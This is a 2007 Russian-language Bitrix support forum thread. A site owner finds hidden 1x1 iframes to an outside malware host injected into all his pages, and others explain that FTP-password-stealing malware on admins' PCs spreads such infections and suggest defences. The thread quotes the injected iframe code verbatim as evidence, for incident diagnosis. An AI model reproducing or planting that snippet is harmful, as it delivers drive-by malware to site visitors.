1С-Битрикс Разработчикам

Заглянувший

Сообщений: 8 Регистрация: 13.12.2005

01.06.2007 10:58:02

Сегодня с утра обнаружил очень странную вещь. Началось все с того, что позвонил партнер и пожаловался на то, что наш сайт не грузится. Смотрю у себя в файрфоксе - все замечательно работает и я уже мысленно посылаю "тупого идиота с кривыми руками". Однако у меня появилось сомнение - я загружаю эксплорер и вуаля - пустой экран. Код страницы:

Код
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <HTML><HEAD> <META http-equiv=Content-Type content="text/html; charset=windows-1251"></HEAD> <BODY></BODY></HTML>

Пытался разобраться минут 15, отключил все жава скрипты, счетчики - вообще, все что можно было бы отрубить. И тут случайно натыкаюсь в индексном файле, в самом конце вставлен код:

Код

<!-- ~ --><iframe src='http://takesnames.info/st/go.php?sid=' width=1 height=1 style='visibility: hidden;'></iframe>

<iframe src='http://takesnames.info/st/go.php?sid=1' width=1 height=1 style='visibility: hidden;'></iframe>

<iframe src='http://takesnames.info/st/go.php?sid=2' width=1 height=1 style='visibility: hidden;'></iframe>

<iframe src='http://takesnames.info/st/go.php?sid=3' width=1 height=1 style='visibility: hidden;'></iframe><!-- ~ -->

откуда он взялся - не знаю, сисадмин тоже не знает.

Поправил рутовый индексник - индексная страница заработала. Начал лазить по сайту - все остальные страницы заражены этим же кодом. Не знаю сколько раз я выразился матом, пока исправлял все это, но приличные слова я подобрать не могу.

Существуют ли какие-то проблемы с уязвимостью битрикса? Может какая-нибудь дыра открыта? Сам битрикс обновлен до последней версии, "новые обновления ядра недоступны".

урл сайта - ISS

Пользователь 1441

Гуру

Сообщений: 1126 Баллов: 569 Регистрация: 23.03.2005

01.06.2007 11:03:05

Цитата Дмитрия Вальянова из закрытого форума:

Цитата

Коллеги,

За последние несколько дней участилось число сообщений о заражении сайтов построенных на различных платформах.

На форуме сайта virusinfo.info обсуждают проблему касательно сайтов, построенных на базе Joomla.
Здесь же вы найдете комментарии администраторов хостинга по возможным причинам заражения вирусом.
http://virusinfo.info/showthread.php?t=9701&page=2

Проблема между тем касается многих сайтов.
Случаи массового заражения сайтов на хостингах нередки.
Не далее как полгода назад был случай массового заражения сайтов на Valuehost, тогда пострадали 470 ресурсов:
http://itua.info/news/security/6990.html

Совсем недавно с предупреждением выступил и другой хостер:
http://www.gold-host.ru/viewtopic.php?p=143

Суть проблемы в том, что в код определенных страниц на сайтах размещается скрипт, который встраивает iframe с подключаением к удаленному сайту, распространяющему вирус.

После загрузки с сайта и установки в систему, вирус проверяет доступные пароли к FTP серверам и пытается инфицировать файлы на них.

Таки образом, подцепив заразу, можно поставить под угрозу массу сайтов, к которым у вас есть доступ по FTP.

Восклицание Пожалуйста, внимательно ознакомьтесь с приведенными выше ссылками!

Могу посоветовать использовать антивирус Avast!, он четко среагировал при подключении к странице, содержащей вредоносный код.

Для того чтобы всегда знать, были ли модифицированы файлы на сервере можно использовать встроенный в продукт механизм "Контроля файлов".
( см. http://www.bitrix.ru/learning/course/...D=6&ID=270 )

Пожалуйста сообщайте нам в техподдержку, в случае, если вы столкнетесь в своей работе с какими-либо проявлениями подобных вирусов.

студия Leveret

Пользователь 2970 Заглянувший Сообщений: 8 Регистрация: 13.12.2005	#3 0 01.06.2007 11:13:40 ахренеть, дайте две.........я в шоке спасибо за оперативный ответ

Пользователь 5427 Гуру Сообщений: 2435 Баллов: 547 Регистрация: 09.08.2006 оО	#4 0 01.06.2007 11:21:22 Эта проблема уже поднималась в форуме http://www.bitrixsoft.ru/support/forum/forum7/topic6813/message40793/ ИКСТРИ https://x3group.ru

Dmitry Valyanov

Администратор

Сообщений: 2015 Баллов: 237 Регистрация: 30.12.2002

01.06.2007 11:22:10

Цитата
Василий Умнов пишет: я в шоке

Василий,

проверяйте на вирус свой компьютер и компьютер администраторов, у которых есть вход на FTP.

По информации других источников - пароли вычитываются вирусом из Total Commander.

Пользователь 6732

Эксперт

Сообщений: 447 Баллов: 74 Регистрация: 29.10.2006

Спрашивайте...

01.06.2007 11:24:35

Цитата
Dmitry Valyanov пишет: пароли вычитываются вирусом из Total Commander

Слава Богу, не пользуемся им ;-)

------
PHP - он всеядный, в плане типов данных. Если прикажешь - он тебе правду на 10 умножит, или ложь на пополам поделит..!

Пользователь 2970

Заглянувший

Сообщений: 8 Регистрация: 13.12.2005

01.06.2007 11:27:17

Цитата
Василий, проверяйте на вирус свой компьютер и компьютер администраторов, у которых есть вход на FTP. По информации других источников - пароли вычитываются вирусом из Total Commander.

Тотал коммандером не пользуюсь......стоит Cute FTP и FAR.

Сейчас идет принудительное сканирование всех дисков на вирусы.

Пользователь 2970

Заглянувший

Сообщений: 8 Регистрация: 13.12.2005

01.06.2007 11:30:19

Цитата
Евгений Педан пишет: Эта проблема уже поднималась в форуме http://www.bitrixsoft.ru/support/forum/forum7/topic6813/message40793/

У меня требует дополнительной авторизации

Dmitry Valyanov

Администратор

Сообщений: 2015 Баллов: 237 Регистрация: 30.12.2002

01.06.2007 12:12:07

Цитата
Василий Умнов пишет: стоит Cute FTP и FAR.

Возможно первое. Вроде бы на Far не грешат.

Цитата
Василий Умнов пишет: У меня требует дополнительной авторизации

Укажите пожалуйста ваш клиентский логин, привяжем вас к закрытому форуму, если вы являетесь клиентом компании.

Пользователь 2970

Заглянувший

Сообщений: 8 Регистрация: 13.12.2005

#10

01.06.2007 12:53:58

Цитата
Dmitry Valyanov пишет: Укажите пожалуйста ваш клиентский логин, привяжем вас к закрытому форуму, если вы являетесь клиентом компании.

хм...какой логин?

форумский? baumanets

Форум

Центр поддержки

Продукты

Управление сайтом

Битрикс24

Интернет-магазин + CRM

Решения

Для интернет-магазинов

Каталог готовых решений

Внедрение

Выбрать партнера

Проверить партнера

Стать партнером